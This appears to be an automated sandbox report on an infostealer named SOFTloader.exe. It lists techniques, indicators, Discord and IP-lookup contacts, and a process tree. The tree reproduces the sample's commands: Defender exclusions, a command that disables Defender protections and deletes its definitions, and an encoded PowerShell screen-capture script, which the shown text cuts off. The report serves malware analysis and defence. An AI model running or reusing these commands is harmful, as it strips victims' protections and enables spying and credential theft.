c7b2ff08a1f644345f2449974a529ef5b88df0253837142cb612a7858ea600e0

Analysis

max time kernel
147s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
08-10-2024 14:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SOFTloader.exe
Size

7.4MB
MD5

18805c0e1af582de6d201d6c0c649fc0
SHA1

bb6d4ccb11fb0a2b490f319efefa62263ce9082c
SHA256

c7b2ff08a1f644345f2449974a529ef5b88df0253837142cb612a7858ea600e0
SHA512

c631d25887accf3974a1709534b5d30413684464ebc2bcee5a11426744c4adf150e3c32cfbd571741a9b342142f4a9ff17f98d669df8dad36ef68c8155714b79
SSDEEP

196608:qr5BurErvI9pWjgyvoaYrE41JIuIqoxkF:GurEUWjdo/H1J9oGF

Score

8^/10

defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3452	powershell.exe
3596	powershell.exe
5024	powershell.exe
4948	powershell.exe
5040	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3860	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe
3600	SOFTloader.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	discord.com
3	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
1504	tasklist.exe
1944	tasklist.exe

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ab04-21.dat	upx
behavioral1/memory/3600-25-0x00007FF9A5700000-0x00007FF9A5CF0000-memory.dmp	upx
behavioral1/files/0x001d00000002aaf1-27.dat	upx
behavioral1/files/0x001900000002ab02-29.dat	upx
behavioral1/memory/3600-32-0x00007FF9B23B0000-0x00007FF9B23BF000-memory.dmp	upx
behavioral1/memory/3600-31-0x00007FF9B2310000-0x00007FF9B2334000-memory.dmp	upx
behavioral1/files/0x001900000002aafc-48.dat	upx
behavioral1/files/0x001900000002aaf9-47.dat	upx
behavioral1/files/0x001900000002aaf8-46.dat	upx
behavioral1/files/0x001c00000002aaf7-45.dat	upx
behavioral1/files/0x001900000002aaf6-44.dat	upx
behavioral1/files/0x001900000002aaf3-43.dat	upx
behavioral1/files/0x001900000002aaf2-42.dat	upx
behavioral1/files/0x004800000002aaec-41.dat	upx
behavioral1/files/0x001900000002ab0b-40.dat	upx
behavioral1/files/0x001900000002ab0a-39.dat	upx
behavioral1/files/0x001c00000002ab09-38.dat	upx
behavioral1/files/0x001c00000002ab03-35.dat	upx
behavioral1/files/0x001900000002aaff-34.dat	upx
behavioral1/memory/3600-54-0x00007FF9AD0B0000-0x00007FF9AD0DD000-memory.dmp	upx
behavioral1/memory/3600-56-0x00007FF9AD4C0000-0x00007FF9AD4D9000-memory.dmp	upx
behavioral1/memory/3600-58-0x00007FF9AD080000-0x00007FF9AD0A3000-memory.dmp	upx
behavioral1/memory/3600-60-0x00007FF9A8CE0000-0x00007FF9A8E56000-memory.dmp	upx
behavioral1/memory/3600-62-0x00007FF9AD3E0000-0x00007FF9AD3F9000-memory.dmp	upx
behavioral1/memory/3600-64-0x00007FF9B2370000-0x00007FF9B237D000-memory.dmp	upx
behavioral1/memory/3600-66-0x00007FF9ABDA0000-0x00007FF9ABDD3000-memory.dmp	upx
behavioral1/memory/3600-72-0x00007FF9A85D0000-0x00007FF9A869D000-memory.dmp	upx
behavioral1/memory/3600-74-0x00007FF997130000-0x00007FF997659000-memory.dmp	upx
behavioral1/memory/3600-71-0x00007FF9B2310000-0x00007FF9B2334000-memory.dmp	upx
behavioral1/memory/3600-76-0x00007FF9AD060000-0x00007FF9AD074000-memory.dmp	upx
behavioral1/memory/3600-79-0x00007FF9AC070000-0x00007FF9AC07D000-memory.dmp	upx
behavioral1/memory/3600-78-0x00007FF9AD0B0000-0x00007FF9AD0DD000-memory.dmp	upx
behavioral1/memory/3600-70-0x00007FF9A5700000-0x00007FF9A5CF0000-memory.dmp	upx
behavioral1/memory/3600-85-0x00007FF9A84B0000-0x00007FF9A85CC000-memory.dmp	upx
behavioral1/memory/3600-84-0x00007FF9AD4C0000-0x00007FF9AD4D9000-memory.dmp	upx
behavioral1/memory/3600-86-0x00007FF9AD080000-0x00007FF9AD0A3000-memory.dmp	upx
behavioral1/memory/3600-98-0x00007FF9A8CE0000-0x00007FF9A8E56000-memory.dmp	upx
behavioral1/memory/3600-138-0x00007FF9AD3E0000-0x00007FF9AD3F9000-memory.dmp	upx
behavioral1/memory/3600-208-0x00007FF9ABDA0000-0x00007FF9ABDD3000-memory.dmp	upx
behavioral1/memory/3600-230-0x00007FF9A85D0000-0x00007FF9A869D000-memory.dmp	upx
behavioral1/memory/3600-231-0x00007FF9A5700000-0x00007FF9A5CF0000-memory.dmp	upx
behavioral1/memory/3600-257-0x00007FF9AD060000-0x00007FF9AD074000-memory.dmp	upx
behavioral1/memory/3600-256-0x00007FF9A85D0000-0x00007FF9A869D000-memory.dmp	upx
behavioral1/memory/3600-255-0x00007FF9ABDA0000-0x00007FF9ABDD3000-memory.dmp	upx
behavioral1/memory/3600-254-0x00007FF9B2370000-0x00007FF9B237D000-memory.dmp	upx
behavioral1/memory/3600-253-0x00007FF9AD3E0000-0x00007FF9AD3F9000-memory.dmp	upx
behavioral1/memory/3600-252-0x00007FF9A8CE0000-0x00007FF9A8E56000-memory.dmp	upx
behavioral1/memory/3600-251-0x00007FF9AD080000-0x00007FF9AD0A3000-memory.dmp	upx
behavioral1/memory/3600-250-0x00007FF9AD4C0000-0x00007FF9AD4D9000-memory.dmp	upx
behavioral1/memory/3600-249-0x00007FF9AD0B0000-0x00007FF9AD0DD000-memory.dmp	upx
behavioral1/memory/3600-248-0x00007FF9B2310000-0x00007FF9B2334000-memory.dmp	upx
behavioral1/memory/3600-247-0x00007FF9B23B0000-0x00007FF9B23BF000-memory.dmp	upx
behavioral1/memory/3600-246-0x00007FF997130000-0x00007FF997659000-memory.dmp	upx
behavioral1/memory/3600-245-0x00007FF9A84B0000-0x00007FF9A85CC000-memory.dmp	upx
behavioral1/memory/3600-244-0x00007FF9AC070000-0x00007FF9AC07D000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3940	WMIC.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
4948	powershell.exe
3452	powershell.exe
5040	powershell.exe
5040	powershell.exe
4948	powershell.exe
3452	powershell.exe
4960	powershell.exe
4960	powershell.exe
3596	powershell.exe
3596	powershell.exe
3216	powershell.exe
3216	powershell.exe
5024	powershell.exe
5024	powershell.exe
2012	powershell.exe
2012	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeDebugPrivilege	5040	powershell.exe
Token: SeDebugPrivilege	1504	tasklist.exe
Token: SeDebugPrivilege	1944	tasklist.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	3216	powershell.exe
Token: SeIncreaseQuotaPrivilege	1428	WMIC.exe
Token: SeSecurityPrivilege	1428	WMIC.exe
Token: SeTakeOwnershipPrivilege	1428	WMIC.exe
Token: SeLoadDriverPrivilege	1428	WMIC.exe
Token: SeSystemProfilePrivilege	1428	WMIC.exe
Token: SeSystemtimePrivilege	1428	WMIC.exe
Token: SeProfSingleProcessPrivilege	1428	WMIC.exe
Token: SeIncBasePriorityPrivilege	1428	WMIC.exe
Token: SeCreatePagefilePrivilege	1428	WMIC.exe
Token: SeBackupPrivilege	1428	WMIC.exe
Token: SeRestorePrivilege	1428	WMIC.exe
Token: SeShutdownPrivilege	1428	WMIC.exe
Token: SeDebugPrivilege	1428	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1428	WMIC.exe
Token: SeRemoteShutdownPrivilege	1428	WMIC.exe
Token: SeUndockPrivilege	1428	WMIC.exe
Token: SeManageVolumePrivilege	1428	WMIC.exe
Token: 33	1428	WMIC.exe
Token: 34	1428	WMIC.exe
Token: 35	1428	WMIC.exe
Token: 36	1428	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1428	WMIC.exe
Token: SeSecurityPrivilege	1428	WMIC.exe
Token: SeTakeOwnershipPrivilege	1428	WMIC.exe
Token: SeLoadDriverPrivilege	1428	WMIC.exe
Token: SeSystemProfilePrivilege	1428	WMIC.exe
Token: SeSystemtimePrivilege	1428	WMIC.exe
Token: SeProfSingleProcessPrivilege	1428	WMIC.exe
Token: SeIncBasePriorityPrivilege	1428	WMIC.exe
Token: SeCreatePagefilePrivilege	1428	WMIC.exe
Token: SeBackupPrivilege	1428	WMIC.exe
Token: SeRestorePrivilege	1428	WMIC.exe
Token: SeShutdownPrivilege	1428	WMIC.exe
Token: SeDebugPrivilege	1428	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1428	WMIC.exe
Token: SeRemoteShutdownPrivilege	1428	WMIC.exe
Token: SeUndockPrivilege	1428	WMIC.exe
Token: SeManageVolumePrivilege	1428	WMIC.exe
Token: 33	1428	WMIC.exe
Token: 34	1428	WMIC.exe
Token: 35	1428	WMIC.exe
Token: 36	1428	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3824	WMIC.exe
Token: SeSecurityPrivilege	3824	WMIC.exe
Token: SeTakeOwnershipPrivilege	3824	WMIC.exe
Token: SeLoadDriverPrivilege	3824	WMIC.exe
Token: SeSystemProfilePrivilege	3824	WMIC.exe
Token: SeSystemtimePrivilege	3824	WMIC.exe
Token: SeProfSingleProcessPrivilege	3824	WMIC.exe
Token: SeIncBasePriorityPrivilege	3824	WMIC.exe
Token: SeCreatePagefilePrivilege	3824	WMIC.exe
Token: SeBackupPrivilege	3824	WMIC.exe
Token: SeRestorePrivilege	3824	WMIC.exe
Token: SeShutdownPrivilege	3824	WMIC.exe
Token: SeDebugPrivilege	3824	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3824	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 892 wrote to memory of 3600	892	SOFTloader.exe	77
PID 892 wrote to memory of 3600	892	SOFTloader.exe	77
PID 3600 wrote to memory of 2088	3600	SOFTloader.exe	78
PID 3600 wrote to memory of 2088	3600	SOFTloader.exe	78
PID 3600 wrote to memory of 3296	3600	SOFTloader.exe	79
PID 3600 wrote to memory of 3296	3600	SOFTloader.exe	79
PID 3600 wrote to memory of 3220	3600	SOFTloader.exe	82
PID 3600 wrote to memory of 3220	3600	SOFTloader.exe	82
PID 2088 wrote to memory of 4948	2088	cmd.exe	84
PID 2088 wrote to memory of 4948	2088	cmd.exe	84
PID 3296 wrote to memory of 3452	3296	cmd.exe	85
PID 3296 wrote to memory of 3452	3296	cmd.exe	85
PID 3220 wrote to memory of 5040	3220	cmd.exe	86
PID 3220 wrote to memory of 5040	3220	cmd.exe	86
PID 3600 wrote to memory of 4036	3600	SOFTloader.exe	87
PID 3600 wrote to memory of 4036	3600	SOFTloader.exe	87
PID 3600 wrote to memory of 2304	3600	SOFTloader.exe	89
PID 3600 wrote to memory of 2304	3600	SOFTloader.exe	89
PID 4036 wrote to memory of 1504	4036	cmd.exe	91
PID 4036 wrote to memory of 1504	4036	cmd.exe	91
PID 2304 wrote to memory of 1944	2304	cmd.exe	92
PID 2304 wrote to memory of 1944	2304	cmd.exe	92
PID 3600 wrote to memory of 1492	3600	SOFTloader.exe	93
PID 3600 wrote to memory of 1492	3600	SOFTloader.exe	93
PID 1492 wrote to memory of 4960	1492	cmd.exe	95
PID 1492 wrote to memory of 4960	1492	cmd.exe	95
PID 4960 wrote to memory of 1860	4960	powershell.exe	97
PID 4960 wrote to memory of 1860	4960	powershell.exe	97
PID 1860 wrote to memory of 4908	1860	csc.exe	98
PID 1860 wrote to memory of 4908	1860	csc.exe	98
PID 3600 wrote to memory of 5028	3600	SOFTloader.exe	99
PID 3600 wrote to memory of 5028	3600	SOFTloader.exe	99
PID 5028 wrote to memory of 3596	5028	cmd.exe	101
PID 5028 wrote to memory of 3596	5028	cmd.exe	101
PID 3600 wrote to memory of 3992	3600	SOFTloader.exe	102
PID 3600 wrote to memory of 3992	3600	SOFTloader.exe	102
PID 3992 wrote to memory of 3216	3992	cmd.exe	104
PID 3992 wrote to memory of 3216	3992	cmd.exe	104
PID 3600 wrote to memory of 4164	3600	SOFTloader.exe	105
PID 3600 wrote to memory of 4164	3600	SOFTloader.exe	105
PID 4164 wrote to memory of 3860	4164	cmd.exe	107
PID 4164 wrote to memory of 3860	4164	cmd.exe	107
PID 3600 wrote to memory of 3712	3600	SOFTloader.exe	108
PID 3600 wrote to memory of 3712	3600	SOFTloader.exe	108
PID 3712 wrote to memory of 1428	3712	cmd.exe	110
PID 3712 wrote to memory of 1428	3712	cmd.exe	110
PID 3600 wrote to memory of 4556	3600	SOFTloader.exe	111
PID 3600 wrote to memory of 4556	3600	SOFTloader.exe	111
PID 4556 wrote to memory of 3824	4556	cmd.exe	113
PID 4556 wrote to memory of 3824	4556	cmd.exe	113
PID 3600 wrote to memory of 504	3600	SOFTloader.exe	114
PID 3600 wrote to memory of 504	3600	SOFTloader.exe	114
PID 504 wrote to memory of 4816	504	cmd.exe	116
PID 504 wrote to memory of 4816	504	cmd.exe	116
PID 3600 wrote to memory of 1016	3600	SOFTloader.exe	117
PID 3600 wrote to memory of 1016	3600	SOFTloader.exe	117
PID 1016 wrote to memory of 5024	1016	cmd.exe	119
PID 1016 wrote to memory of 5024	1016	cmd.exe	119
PID 3600 wrote to memory of 2572	3600	SOFTloader.exe	120
PID 3600 wrote to memory of 2572	3600	SOFTloader.exe	120
PID 2572 wrote to memory of 3940	2572	cmd.exe	122
PID 2572 wrote to memory of 3940	2572	cmd.exe	122
PID 3600 wrote to memory of 744	3600	SOFTloader.exe	123
PID 3600 wrote to memory of 744	3600	SOFTloader.exe	123

C:\Users\Admin\AppData\Local\Temp\SOFTloader.exe
"C:\Users\Admin\AppData\Local\Temp\SOFTloader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:892
- C:\Users\Admin\AppData\Local\Temp\SOFTloader.exe
  "C:\Users\Admin\AppData\Local\Temp\SOFTloader.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SOFTloader.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SOFTloader.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3296
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4036
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2304
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1492
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAA